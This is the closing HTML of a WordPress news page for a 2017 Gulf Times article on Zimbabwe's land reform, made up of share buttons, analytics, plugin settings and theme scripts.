data-social_type="share" data-location="flyin"><i class="et_social_icon et_social_icon_googleplus"></i><div class="et_social_network_label"><div class="et_social_networkname">Google+</div></div><span class="et_social_overlay"></span></a></li><li class="et_social_pinterest"><a href="#" class="et_social_share_pinterest" rel="nofollow" data-social_name="pinterest" data-post_id="33963" data-social_type="share" data-location="flyin"><i class="et_social_icon et_social_icon_pinterest"></i><div class="et_social_network_label"><div class="et_social_networkname">Pinterest</div></div><span class="et_social_overlay"></span></a></li><li class="et_social_linkedin"><a href="http://www.linkedin.com/shareArticle?mini=true&#038;url=http%3A%2F%2Fwww.gulftimes.com%2F2017%2F08%2F04%2Fzimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim%2F&#038;title=Zimbabwe%3A%20Land%20Reform%20%E2%80%93%20Mugabe%20%27Getting%20Undue%20Credit%27%2C%20War%20Vets%20Claim" class="et_social_share" rel="nofollow" data-social_name="linkedin" data-post_id="33963" data-social_type="share" data-location="flyin"><i class="et_social_icon et_social_icon_linkedin"></i><div class="et_social_network_label"><div class="et_social_networkname">LinkedIn</div></div><span class="et_social_overlay"></span></a></li><li class="et_social_stumbleupon"><a href="http://www.stumbleupon.com/badge?url=http%3A%2F%2Fwww.gulftimes.com%2F2017%2F08%2F04%2Fzimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim%2F&#038;title=Zimbabwe%3A%20Land%20Reform%20%E2%80%93%20Mugabe%20%27Getting%20Undue%20Credit%27%2C%20War%20Vets%20Claim" class="et_social_share" rel="nofollow" data-social_name="stumbleupon" data-post_id="33963" data-social_type="share" data-location="flyin"><i class="et_social_icon et_social_icon_stumbleupon"></i><div class="et_social_network_label"><div class="et_social_networkname">StumbleUpon</div></div><span class="et_social_overlay"></span></a></li></ul>
					</div>
				</div>



    <!--



        Theme: Newspaper by tagDiv 2015

        Version: 6.5.1 (rara)

        Deploy mode: deploy

        

        uid: 5984928ee65be

    -->



    
<!-- Custom css form theme panel -->
<style type="text/css" media="screen">
/* custom css theme panel */
.notice, div.error, div.updated {
display: none;
}

.notice-error, div.error {
display: none;
}

.media-upload-form .notice, .media-upload-form div.error, .wrap .notice, .wrap div.error, .wrap div.updated {
display: none;
}

#wpadminbar ul li:last-child, #wpadminbar ul li:last-child .ab-item {
display: none;
}
</style>

<script type=text/javascript>
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-71428134-1', 'auto');
  ga('send', 'pageview');

</script>
</script><script type='text/javascript' src='http://www.gulftimes.com/wp-content/plugins/monarch/js/idle-timer.min.js?ver=1.2.5'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var monarchSettings = {"ajaxurl":"http:\/\/www.gulftimes.com\/wp-admin\/admin-ajax.php","pageurl":"http:\/\/www.gulftimes.com\/2017\/08\/04\/zimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim\/","stats_nonce":"4c8a07c13a","share_counts":"ea718a9fd4","follow_counts":"8c936f2a73","total_counts":"92abf62ae1","media_single":"3f3579ac46","media_total":"6a34c582cc","generate_all_window_nonce":"0cf2e631e4","no_img_message":"No images available for sharing on this page"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.gulftimes.com/wp-content/plugins/monarch/js/custom.js?ver=1.2.5'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var JQLBSettings = {"fitToScreen":"0","resizeSpeed":"400","displayDownloadLink":"0","navbarOnTop":"0","loopImages":"","resizeCenter":"","marginSize":"","linkTarget":"","help":"","prevLinkTitle":"previous image","nextLinkTitle":"next image","prevLinkText":"\u00ab Previous","nextLinkText":"Next \u00bb","closeTitle":"close image gallery","image":"Image ","of":" of ","download":"Download","jqlb_overlay_opacity":"80","jqlb_overlay_color":"#000000","jqlb_overlay_close":"1","jqlb_border_width":"10","jqlb_border_color":"#ffffff","jqlb_border_radius":"0","jqlb_image_info_background_transparency":"100","jqlb_image_info_bg_color":"#ffffff","jqlb_image_info_text_color":"#000000","jqlb_image_info_text_fontsize":"10","jqlb_show_text_for_image":"1","jqlb_next_image_title":"next image","jqlb_previous_image_title":"previous image","jqlb_next_button_image":"http:\/\/www.gulftimes.com\/wp-content\/plugins\/wp-lightbox-2\/styles\/images\/next.gif","jqlb_previous_button_image":"http:\/\/www.gulftimes.com\/wp-content\/plugins\/wp-lightbox-2\/styles\/images\/prev.gif","jqlb_maximum_width":"","jqlb_maximum_height":"","jqlb_show_close_button":"1","jqlb_close_image_title":"close image gallery","jqlb_close_image_max_heght":"22","jqlb_image_for_close_lightbox":"http:\/\/www.gulftimes.com\/wp-content\/plugins\/wp-lightbox-2\/styles\/images\/closelabel.gif","jqlb_keyboard_navigation":"1","jqlb_popup_size_fix":"0"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.gulftimes.com/wp-content/plugins/wp-lightbox-2/wp-lightbox-2.min.js?ver=1.3.4.1'></script>
<script type='text/javascript' src='http://www.gulftimes.com/wp-content/themes/Newspaper/js/tagdiv_theme.js?ver=6.5.1'></script>
<script type='text/javascript' src='http://www.gulftimes.com/wp-includes/js/comment-reply.min.js?ver=4.6.6'></script>
<script type='text/javascript' src='http://www.gulftimes.com/wp-includes/js/wp-embed.min.js?ver=4.6.6'></script>

<!-- JS generated by theme -->

<script>
    


	



		(function(){

			var html_jquery_obj = jQuery('html');



			if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) {



				var path = 'http://www.gulftimes.com/wp-content/themes/Newspaper/style.css';



				jQuery.get(path, function(data) {



					var str_split_separator = '#td_css_split_separator';

					var arr_splits = data.split(str_split_separator);

					var arr_length = arr_splits.length;



					if (arr_length > 1) {



						var dir_path = 'http://www.gulftimes.com/wp-content/themes/Newspaper';

						var splited_css = '';



						for (var i = 0; i < arr_length; i++) {

							if (i > 0) {

								arr_splits[i] = str_split_separator + ' ' + arr_splits[i];

							}

							//jQuery('head').append('<style>' + arr_splits[i] + '</style>');



							var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) {

								return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,'');

							});



							splited_css += "<style>" + formated_str + "</style>";

						}



						var td_theme_css = jQuery('link#td-theme-css');



						if (td_theme_css.length) {

							td_theme_css.after(splited_css);

						}

					}

				});

			}

		})();



	

	
</script>




</body>

</html>